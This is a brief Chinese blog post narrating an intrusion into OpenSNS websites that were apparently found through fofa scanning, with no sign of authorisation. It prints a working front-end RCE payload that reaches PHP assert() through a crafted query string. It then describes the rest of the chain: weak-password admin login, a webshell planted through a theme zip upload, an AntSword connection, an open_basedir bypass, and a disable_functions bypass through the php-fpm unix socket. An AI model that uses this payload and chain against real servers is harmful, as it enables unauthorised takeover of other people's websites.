记一次简单的渗透（二）

关于OpenSNS的漏洞

前台RCE

payload

index.php?s=weibo/share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[method]=-%3E_validationFieldItem%26id[status]=1%26id[4]=function%26id[1]=assert%26id[args]=jiang=phpinfo()%26id[0]=jiang

后台文件上传

模板处上传zip文件，直接将木马解压到 /Theme/ 目录。

后台RCE

后台任意文件下载

还有个后台任意文件夹的删除。分析可以参看我的另一篇文章。

信息搜集

fofa 上找站

漏洞是存在的

还是有disable_func 和 open_basedir 的

php5 的环境，一些危险模块也是不存在的。

存在fpm/fastcgi

思路就是，借助其来完成bypass disable_func。

又看了一眼后台，弱口令进入后，通过文件上传植入木马。

在此处，解压路径是 /Theme/

GETSHELL

蚁剑连上后，

修改木马，来bypass open_basedir。

尝试去寻找 php-fpm 和apache的一些配置文件，寻找 fpm开放端口的情况，因为在尝试探测9000端口的时候，发现似乎并不开放。

从目录规则可以看出来是一个宝塔的面板。

进入 server/php目录

本站的环境是php5.6的，php-fpm.conf 如下。

此处监听的是 /tmp/php-cgi-56.sock

不同于以往的 127.0.0.1:9000 或者 0.0.0.0:9000

攻击tcp模式的方式显然不行，但是我们已经知道fpm 的 sock 文件的绝对路径。直接去交互他，或者用 unix:// 套接字的方式依然可行。可以直接用蚁剑

或者构造fsockopen这个函数去请求，可以参照newsctf中的一个题目，修改fpm.sock的地址就好。

蚁剑bypass成功后，修改数据中shell的脚本名字如下

然后打开终端，发现命令可以执行了。

参考

https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/5